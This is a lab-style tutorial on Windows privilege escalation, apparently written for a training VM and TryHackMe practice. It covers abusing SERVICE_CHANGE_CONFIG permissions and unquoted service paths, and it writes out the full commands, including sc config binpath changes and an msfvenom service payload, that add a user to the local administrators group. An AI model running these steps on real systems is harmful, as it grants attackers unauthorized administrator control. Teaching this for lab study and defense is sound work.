# Escalation Path Service Permissions

## Binary - Path

### Binary Path in Windows Services

A **binary path** (`binpath`) in Windows services defines the **executable file** that runs when the service starts. This path is stored in the **Windows Registry** and tells the system what to execute when a service is launched.

### How is it Exploited for Privilege Escalation?

If a user has **SERVICE_CHANGE_CONFIG** permissions on a service, they can **modify the binary path** and point it to a **malicious command or executable**. When the service is restarted, Windows will execute the new binary **with system-level privileges**.

### Detection

**Windows VM**

```
accesschk64.exe
```

Open command prompt and type: 

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
```

Notice that the output suggests that the user “`User-PC\User`” has the “`SERVICE_CHANGE_CONFIG`” permission.

### Exploitation

**Windows VM**

In command prompt type:

```
sc config daclsvc binpath= "net localgroup administrators user /add" 
``` 

In command prompt type: 

```
sc start daclsvc
```

It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

```
net localgroup administrators
```

## Unquoted Service Path Explanation

### What is an Unquoted Service Path?

In Windows, services are executed based on their **binary path**, which tells the system where to find the executable file.

If the path contains **spaces** but is **not enclosed in quotes**, Windows may misinterpret it and attempt to execute unintended programs.

### Detection

**Windows VM**

Open command prompt and type:

```
sc qc unquotedsvc
```

Notice that the “`BINARY_PATH_NAME`” field displays a path that is not confined between quotes.

### Exploitation

**Kali VM**

Open command prompt and type:

```
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe  
```

Copy the generated file, `common.exe`, to the Windows VM.

**Windows VM**

Place common.exe in ‘C:\Program Files\Unquoted Path Service’.  

Open command prompt and type: 

```
sc start unquotedsvc
```


It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: 

```
net localgroup administrators
```

For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain ([https://tryhackme.com/room/steelmountain](https://tryhackme.com/room/steelmountain)).